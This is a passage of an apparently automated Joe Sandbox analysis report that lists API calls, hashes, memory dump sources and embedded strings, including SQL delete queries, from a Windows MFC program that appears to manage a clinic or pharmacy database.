                                • API ID: String$Convert_com_util::$_com_issue_error$Interlocked$DecrementFree$IncrementInitialize
                                • String ID: DELETE FROM Users WHERE UserName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 1888611721-2312617859
                                • Opcode ID: e6921ddb2f8645274b504ffbaf50172af1a27e7b75dfa3db84cc186cfb747057
                                • Instruction ID: 164d603112276d6fc63a26decab73e5d9b7e960cd18e1adaa6b7910bd0748915
                                • Opcode Fuzzy Hash: e6921ddb2f8645274b504ffbaf50172af1a27e7b75dfa3db84cc186cfb747057
                                • Instruction Fuzzy Hash: 9D5145329417419FCB20DBA8CC01BDEB7B9AF14724F10461DE815A73C2DB74AA44CBA2
                                APIs
                                • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 006F8D37
                                • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 006F8D66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc
                                • String ID: CloseTouchInputHandle$GetTouchInputInfo$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$user32.dll
                                • API String ID: 190572456-4257538373
                                • Opcode ID: 26fa6839f9c1b25300d62dd49f9205d92b2c25676569c7aec043c7aaa06362ac
                                • Instruction ID: fd4eaef6b5a9e67c203979dcf1fb7990a23132f81992f9a288fde042cbd1de02
                                • Opcode Fuzzy Hash: 26fa6839f9c1b25300d62dd49f9205d92b2c25676569c7aec043c7aaa06362ac
                                • Instruction Fuzzy Hash: 19515F75A14248AFCB54DF64D886BBE77F2FF98704F108129E621AB390DB745D40DB24
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(-00000008), ref: 006EA691
                                • InterlockedDecrement.KERNEL32(-00000008), ref: 006EA6EC
                                • SysFreeString.OLEAUT32(00000000), ref: 006EA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From Registration Where RegId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-1795776502
                                • Opcode ID: 69ff743fcead1bc9a7ec09cf20b94352a52a9b4ee036a6e5a0aa7964b88203aa
                                • Instruction ID: ebc851c2ab811fd5ce6ee3f735a89967583e7e19b40eb1c54db38113d5937c41
                                • Opcode Fuzzy Hash: 69ff743fcead1bc9a7ec09cf20b94352a52a9b4ee036a6e5a0aa7964b88203aa
                                • Instruction Fuzzy Hash: 54512675D017449BCB10DBA9CC02BDEB7B9EF15314F144219E815A73C1DB74AA04CBE2
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 007806AD
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007806CB
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007806D9
                                  • Part of subcall function 007E55A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E55FA
                                  • Part of subcall function 007E55A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E5605
                                  • Part of subcall function 007E55A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E5610
                                  • Part of subcall function 007E55A0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 007E5646
                                  • Part of subcall function 007E55A0: CreateCompatibleDC.GDI32(00000000), ref: 007E5703
                                  • Part of subcall function 007E55A0: CreateCompatibleDC.GDI32(00000000), ref: 007E5710
                                  • Part of subcall function 007E55A0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E575D
                                  • Part of subcall function 007E55A0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E5777
                                  • Part of subcall function 007E55A0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E5791
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 00780799
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 00780811
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Fac_nodeFac_node::_Iterator_baseIterator_base::_$ProcessorVirtual$CompatibleConcurrency::CreateRootRoot::
                                • String ID: !xw
                                • API String ID: 2250299832-4014596772
                                • Opcode ID: 38fe0d07a7eb09b18248faed9fd216674a97a26bbda99b33cdfe4002cf505e81
                                • Instruction ID: c037a7a0d6edf1a0026548c871187d72092500796fd41efafbd810d6ca0eb106
                                • Opcode Fuzzy Hash: 38fe0d07a7eb09b18248faed9fd216674a97a26bbda99b33cdfe4002cf505e81
                                • Instruction Fuzzy Hash: 0C818374A05259CFEB04DF94C898BDEBBF1FB48318F1442A8D5196B392C77A6805CFA1
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(0092BEA0), ref: 006D7571
                                • InterlockedDecrement.KERNEL32(0092BEA0), ref: 006D7593
                                • SysFreeString.OLEAUT32(00000000), ref: 006D75A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From Doctor Where Id=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-2546879668
                                • Opcode ID: 7738cd766f5ce37a1e1e3c842a1f863388d8c0f82844e6f2abe162c3c9763672
                                • Instruction ID: 1956fce73690b110bf6f582defa37c486a609ad02d6a1cdacb06a838bf0eff9d
                                • Opcode Fuzzy Hash: 7738cd766f5ce37a1e1e3c842a1f863388d8c0f82844e6f2abe162c3c9763672
                                • Instruction Fuzzy Hash: BB411272D446059FCB20DBA8DC01BDEB7B9EF54724F10465AE815A73C1EB74AA04CBE2
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006DE541
                                • InterlockedDecrement.KERNEL32(?), ref: 006DE563
                                • SysFreeString.OLEAUT32(00000000), ref: 006DE574
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From Medicine Where MedId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-1797688189
                                • Opcode ID: 87ade51133a1b2d95e7ca06248657ea9664867a7e029f410978bbd88e62ed714
                                • Instruction ID: 61956e2b193448a1674a9e54d0a8bc282d03acb616e3cb92db987f2a36f6930f
                                • Opcode Fuzzy Hash: 87ade51133a1b2d95e7ca06248657ea9664867a7e029f410978bbd88e62ed714
                                • Instruction Fuzzy Hash: D0412671D416049BCB20EBA8DC01BDEB7B8EF54714F10465AE915A73C1E776AE04CBE1
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006D3671
                                • InterlockedDecrement.KERNEL32(?), ref: 006D3693
                                • SysFreeString.OLEAUT32(00000000), ref: 006D36A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From BaseType Where Id=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-1572003495
                                • Opcode ID: 7783b1fed45721e567341c17a6feb6bd3260e245ef3ee10ee7daaf905a52a599
                                • Instruction ID: e762bbcf46949ddb8b66b52de64fc65d9ac6554133c6bf6f65e51264eee01050
                                • Opcode Fuzzy Hash: 7783b1fed45721e567341c17a6feb6bd3260e245ef3ee10ee7daaf905a52a599
                                • Instruction Fuzzy Hash: 17410172D41654ABDB20DBA8CC02BDAB7B8EF54720F10421AE815A73C1D775EB04CBE6
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006E5D01
                                • InterlockedDecrement.KERNEL32(?), ref: 006E5D23
                                • SysFreeString.OLEAUT32(00000000), ref: 006E5D34
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From PayItems Where PayId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-2742871094
                                • Opcode ID: 730e731f4527d3c232d84cfe9169048f6430039371fa3e8d2cede2fe53fb5ce2
                                • Instruction ID: 2fcbf42ba18d7b444aed173a53a468054cadb1c9037e4a597118538b17231f57
                                • Opcode Fuzzy Hash: 730e731f4527d3c232d84cfe9169048f6430039371fa3e8d2cede2fe53fb5ce2
                                • Instruction Fuzzy Hash: 7A413572D41B449BC720DBA9CC05BDEB7B8EF54724F204619E816A73C1D774AA04CBE5
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006D9E91
                                • InterlockedDecrement.KERNEL32(?), ref: 006D9EB3
                                • SysFreeString.OLEAUT32(00000000), ref: 006D9EC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From Items Where ItemId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-3163567310
                                • Opcode ID: cfa03d9f1e8474627a9338c028de471ea6af87366e795d8802e07fe1d6bc6647
                                • Instruction ID: 752db7cf4c7d7b5e56e6c9b5d7040956f872d34167f396ca67c46ea7e8d52809
                                • Opcode Fuzzy Hash: cfa03d9f1e8474627a9338c028de471ea6af87366e795d8802e07fe1d6bc6647
                                • Instruction Fuzzy Hash: C1410372D41604ABCB20DBA8DC01BDAB7B8EF54720F10461AE915A73D1D775AA04CBE2
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006E5EC1
                                • InterlockedDecrement.KERNEL32(?), ref: 006E5EE3
                                • SysFreeString.OLEAUT32(00000000), ref: 006E5EF4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From PayItems Where RegId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-3441402328
                                • Opcode ID: 7f8f25a776fc9b329ac170e1464cda4cb5f2672db1e86dff9f0c2e4c9d18bde0
                                • Instruction ID: f58ce048f0c98c36c081988d9ae4b737c27c3918ff6b9498e8c77d96dca33145
                                • Opcode Fuzzy Hash: 7f8f25a776fc9b329ac170e1464cda4cb5f2672db1e86dff9f0c2e4c9d18bde0
                                • Instruction Fuzzy Hash: F5413572D01B449BC720DBA9CD01BDAB7B8EF54724F108219E816A73C1DB74AA04CBE2
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006E2FE1
                                • InterlockedDecrement.KERNEL32(?), ref: 006E3003
                                • SysFreeString.OLEAUT32(00000000), ref: 006E3014
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$ConvertDecrementFree_com_util::$Increment_com_issue_error
                                • String ID: Delete From Patient Where Id=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2264986768-2440592435
                                • Opcode ID: 41b592d0a5a52fa10edde6678a5ff950b08504332a5ad471104af1033da0ceca
                                • Instruction ID: 39d22515ef41a85b28858505bab4c7543560d64aacd3bce0211c4b9483dfd7f6
                                • Opcode Fuzzy Hash: 41b592d0a5a52fa10edde6678a5ff950b08504332a5ad471104af1033da0ceca
                                • Instruction Fuzzy Hash: 60414372D41755AFCB20DBA9CC06BDAB7B8EF64720F104259E815A73C1D770AA04CBE2
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea5f078bb24422fc1a83461dba93fd3940629460ac4bbe67e4eaa83611f5d962
                                • Instruction ID: bdf9e459081998de10dcb2dbe83688232402fda6b5f9f360f63753805b5cc8a9
                                • Opcode Fuzzy Hash: ea5f078bb24422fc1a83461dba93fd3940629460ac4bbe67e4eaa83611f5d962
                                • Instruction Fuzzy Hash: 304192B5701300AFF751DF68DC81F2A77EAEF88795F244569FA08CB245E671E8008BA1
                                APIs
                                • IsWindow.USER32(?), ref: 006FB7EC
                                • ScrollWindow.USER32(?,?,?,?,?), ref: 006FB839
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetWindow.USER32(00000005,00000005), ref: 006FB84A
                                • GetWindowRect.USER32(00000000,?), ref: 006FB882
                                • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 006FB8AE
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FB7FB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Message$PeekPostQuitRectScroll
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2414239676-4102074842
                                • Opcode ID: c4250a0ec2773969e7822b1d3a76bced24cfac74d13cbe1ac3c45e590ef7c328
                                • Instruction ID: 3131efbccde53b1bebc41b5d7b1e1dcbbbb1c37f9712199ab33eb7ded69fec33
                                • Opcode Fuzzy Hash: c4250a0ec2773969e7822b1d3a76bced24cfac74d13cbe1ac3c45e590ef7c328
                                • Instruction Fuzzy Hash: 09412A75A0020DEFDB14DF98C885FFEB7BABF88341F108159EA15AB291D734A941DB50
                                APIs
                                • GetWindowTextA.USER32(?,?,00000190), ref: 0071E3E0
                                • __snwscanf.LIBCMTD ref: 0071E3FE
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • __snwprintf_s.LIBCMTD ref: 0071E47F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitTextWindow__snwprintf_s__snwscanf
                                • String ID: %.*g$%lf$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgfloat.cpp
                                • API String ID: 1258062230-2892182904
                                • Opcode ID: 2074db192ac4fdc3bde998d552f7767c17016dcd3f460299f88a38b75840b450
